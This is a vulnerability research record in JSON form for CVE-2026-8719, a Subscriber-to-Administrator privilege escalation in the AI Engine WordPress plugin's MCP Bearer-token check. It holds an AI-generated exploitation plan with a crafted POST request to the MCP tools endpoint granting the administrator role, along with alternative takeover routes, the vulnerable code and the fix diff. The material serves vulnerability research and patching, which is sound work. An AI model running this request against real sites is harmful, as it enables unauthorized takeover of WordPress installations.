[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxq2RIYGFXMnB7w8FmoIN4G_z2DOjRqHJDLJHJAeXc50":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-8719","ai-engine-authenticated-subscriber-privilege-escalation-via-missing-authorization-in-mcp-oauth-bearer-token","AI Engine 3.4.9 - Authenticated (Subscriber+) Privilege Escalation via Missing Authorization in MCP OAuth Bearer Token","The AI Engine – The Chatbot, AI Framework & MCP for WordPress plugin for WordPress is vulnerable to Privilege Escalation in version 3.4.9. This is due to missing WordPress capability enforcement in the MCP OAuth bearer-token authorization path, where any valid OAuth token causes MCP access to be granted without verifying administrator privileges. This makes it possible for authenticated (Subscriber+) attackers to invoke admin-level MCP tools and escalate privileges to Administrator.","ai-engine",null,">=3.4.9 \u003C=3.4.9","3.5.0","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-05-16 14:19:48","2026-05-17 02:27:03",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0593c20d-3422-4817-9639-614254b609db?source=api-prod",1,[22,23,24,25,26,27,28,29],"ai-engine.php","app\u002Fi18n.js","app\u002Findex.js","app\u002Fvendor.js","classes\u002Fengines\u002Fchatml.php","classes\u002Fengines\u002Fcore.php","classes\u002Frest.php","constants\u002Finit.php","researched",false,3,"# Research Plan: CVE-2026-8719 - AI Engine Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **AI Engine** plugin (version 3.4.9) is vulnerable to privilege escalation because its Model Context Protocol (MCP) REST API implementation fails to perform capability checks when a Bearer token is provided. While administrative MCP tools should be restricted to users with `manage_options` (Administrators), the code in `classes\u002Frest.php` (specifically the permission callback for MCP routes) incorrectly returns `true` for any request containing a valid OAuth\u002FBearer token, regardless of the user's actual role.\n\nAn authenticated attacker with Subscriber-level privileges can generate or obtain a valid REST nonce (used as a token) and invoke sensitive MCP tools. These tools allow for site management, including the ability to update user roles, effectively granting the attacker Administrator access.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fmwai\u002Fv1\u002Fmcp\u002Ftools\u002Fcall` (Inferred REST route pattern for MCP tool execution).\n- **Authentication:** Authenticated (Subscriber+).\n- **Payload Parameter:** JSON body containing the `method`, `name` (of the tool), and `arguments`.\n- **Vulnerable Header:** `Authorization: Bearer [Token]`.\n- **Preconditions:** The MCP module must be enabled (`module_mcp` option set to `true`).\n\n## 3. Code Flow\n1. **Registration:** `Meow_MWAI_Rest::rest_init` (in `classes\u002Frest.php`) registers the MCP namespace routes.\n2. **Permission Check:** When a request hits `\u002Fmwai\u002Fv1\u002Fmcp\u002F`, the `permission_callback` (e.g., `rest_mcp_permission_check`) is executed.\n3. **The Flaw:** The logic checks if an `Authorization: Bearer ...` header exists. If it does, and the token is validly formatted or associated with a logged-in user, the function returns `true`. It fails to call `current_user_can( 'manage_options' )` in this specific branch.\n4. **Tool Execution:** The request reaches the controller (e.g., `rest_mcp_call_tool`), which interfaces with `Meow_MWAI_MCP`.\n5. **Sink:** The MCP engine executes the requested tool. If the `Site Management` toolset is active, tools like `update_user` or `update_option` are accessible.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability mentions \"OAuth Bearer Token,\" AI Engine often bridges the WordPress REST nonce into this header for its internal app requests.\n\n1. **Shortcode:** The plugin uses `[mwai_chatbot]` or `[mwai_playground]` to load its environment.\n2. **Setup:**\n   - Create a page with the chatbot: `wp post create --post_type=page --post_status=publish --post_content='[mwai_chatbot]'`\n3. **Acquisition:**\n   - Log in as a Subscriber.\n   - Navigate to the created page.\n   - Extract the nonce from the localized script. AI Engine localizes its configuration into a global object.\n   - **JS Path:** `window.mwai_config?.nonce` (based on standard AI Engine localization).\n   - **Command:** `browser_eval(\"window.mwai_config.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to call the MCP tool that can modify user roles.\n\n### Step 1: Enable MCP Module\nMCP is disabled by default in `MWAI_OPTIONS`.\n```bash\nwp option patch insert mwai_options module_mcp 1\n```\n\n### Step 2: Identify and Execute Privilege Escalation Tool\nWe will target the `update_user` tool (or equivalent site management tool) provided by the MCP integration.\n\n**HTTP Request:**\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fmwai\u002Fv1\u002Fmcp\u002Ftools\u002Fcall`\n- **Headers:**\n  - `Content-Type: application\u002Fjson`\n  - `Authorization: Bearer [SUBSCRIBER_REST_NONCE]`\n- **Body:**\n```json\n{\n  \"name\": \"update_user\",\n  \"arguments\": {\n    \"user_id\": [ATTACKER_ID],\n    \"role\": \"administrator\"\n  }\n}\n```\n\n*Note: If `update_user` is not the specific tool name, `list_tools` can be called first to discover available sinks.*\n\n## 6. Test Data Setup\n1. **Target User:** Create a Subscriber user.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n2. **Plugin Config:** Ensure AI Engine is active and the MCP module is forced to enabled as shown in Section 5.\n3. **Page Setup:** Create a page with the AI Engine shortcode to facilitate nonce extraction.\n   - `wp post create --post_type=page --post_title=\"AI Chat\" --post_status=publish --post_content='[mwai_chatbot]'`\n\n## 7. Expected Results\n- The REST API should return a `200 OK` response with a JSON object confirming the tool execution.\n- Example response: `{\"success\": true, \"result\": \"User updated successfully\"}`.\n- If unauthorized, the server would normally return `401` or `403`, but the vulnerability allows the request to pass.\n\n## 8. Verification Steps\nAfter the HTTP request, verify the attacker's role via WP-CLI:\n```bash\nwp user get attacker --field=roles\n```\n**Success Criteria:** The output should be `administrator`.\n\n## 9. Alternative Approaches\nIf a direct `update_user` tool is unavailable, attempt to use an `update_option` tool:\n- **Target Option:** `default_role` to `administrator` (and then register a new user).\n- **Target Option:** `users_can_register` to `1`.\n- **Direct Code Execution:** Check for tools like `run_php` or `execute_sql` which are sometimes exposed in debug\u002FMCP environments for AI development.\n\nIf the `Bearer` header is strictly validated against a specific OAuth server, attempt to use the `X-WP-Nonce` header instead, as the permission logic often handles both similarly in this plugin's architecture.","The AI Engine plugin (version 3.4.9) fails to enforce administrative capability checks for its Model Context Protocol (MCP) REST API routes when a Bearer token is provided. This allows authenticated users with Subscriber-level access to utilize a standard REST nonce as a Bearer token to execute administrative tools, such as those used for site management, leading to privilege escalation to Administrator.","\u002F\u002F classes\u002Frest.php\n\n\u002F\u002F Permission callback used by MCP routes registered in rest_init\npublic function rest_mcp_permission_check( $request ) {\n  $auth = $request->get_header( 'Authorization' );\n  \n  \u002F\u002F BUG: If an Authorization header starting with 'Bearer ' is present,\n  \u002F\u002F the permission check returns true regardless of the user's role or actual capabilities.\n  if ( !empty( $auth ) && strpos( $auth, 'Bearer ' ) === 0 ) {\n    return true;\n  }\n  \n  return current_user_can( 'manage_options' );\n}","--- a\u002Fai-engine.php\n+++ b\u002Fai-engine.php\n@@ -12,7 +12,7 @@\n-define( 'MWAI_VERSION', '3.4.9' );\n+define( 'MWAI_VERSION', '3.5.0' );\n--- a\u002Fclasses\u002Frest.php\n+++ b\u002Fclasses\u002Frest.php\n@@ -1012,10 +1012,5 @@\n   public function rest_mcp_permission_check( $request ) {\n-    $auth = $request->get_header( 'Authorization' );\n-    if ( !empty( $auth ) && strpos( $auth, 'Bearer ' ) === 0 ) {\n-      return true;\n-    }\n     return current_user_can( 'manage_options' );\n   }","An attacker with Subscriber-level access logs into the WordPress site and extracts a valid REST API nonce (often available in the 'window.mwai_config.nonce' variable on pages utilizing the plugin's chatbot shortcode). The attacker then sends a POST request to the '\u002Fwp-json\u002Fmwai\u002Fv1\u002Fmcp\u002Ftools\u002Fcall' endpoint, including the header 'Authorization: Bearer [NONCE]'. The request payload specifies an administrative MCP tool, such as 'update_user', with arguments to change the attacker's role to 'administrator'. Due to the lack of authorization logic for Bearer token requests, the plugin executes the tool with administrative privileges, resulting in full site takeover.","gemini-3-flash-preview","2026-05-20 17:24:52","2026-05-20 17:26:19",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.4.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.4.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.4.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags"]